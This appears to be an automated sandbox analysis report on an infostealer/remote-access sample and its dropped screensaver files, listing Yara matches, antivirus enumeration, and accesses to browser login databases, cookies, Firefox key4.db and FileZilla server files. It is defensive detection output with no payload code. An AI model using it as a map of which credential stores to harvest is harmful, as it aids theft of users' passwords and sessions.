Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\Public\winnotify.scr Queries volume information: C:\Users\Public\winnotify.scr VolumeInformation
Source: C:\Users\Public\winnotify.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\winnotify.scr Queries volume information: C:\Users\Public\winnotify.scr VolumeInformation
Source: C:\Users\Public\winnotify.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\gbcd\fff.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: fff.scr, 00000017.00000002.1642253355.0000000009002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\gbcd\qqq.scr WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000017.00000002.1630207447.00000000060D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.0000000006227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000632A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fff.scr PID: 8024, type: MEMORYSTR
Source: Yara match File source: 00000017.00000002.1627355609.0000000005352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.00000000060D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005273000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.000000000528D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.0000000006227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.000000000534E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000632A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fff.scr PID: 8024, type: MEMORYSTR
Source: Yara match File source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1620855278.0000000000A52000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2207912589.0000000000452000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3688530749.00000000001C2000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 38.2.winnotify.scr.511f9cc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2324631468.0000000004C52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2381512585.000000000511F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qqq.scr PID: 3452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: winnotify.scr PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: winnotify.scr PID: 7980, type: MEMORYSTR
Source: Yara match File source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\gbcd\fff.scr File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 00000017.00000002.1630207447.00000000060D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.0000000006227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000632A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fff.scr PID: 8024, type: MEMORYSTR
Source: Yara match File source: 00000017.00000002.1627355609.0000000005352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.00000000060D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005273000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.0000000005129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.000000000528D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.0000000006227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.000000000534E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1630207447.000000000632A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fff.scr PID: 8024, type: MEMORYSTR
Source: Yara match File source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1620855278.0000000000A52000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2207912589.0000000000452000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3688530749.00000000001C2000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 38.2.winnotify.scr.511f9cc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2324631468.0000000004C52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2381512585.000000000511F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qqq.scr PID: 3452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: winnotify.scr PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: winnotify.scr PID: 7980, type: MEMORYSTR
Source: Yara match File source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs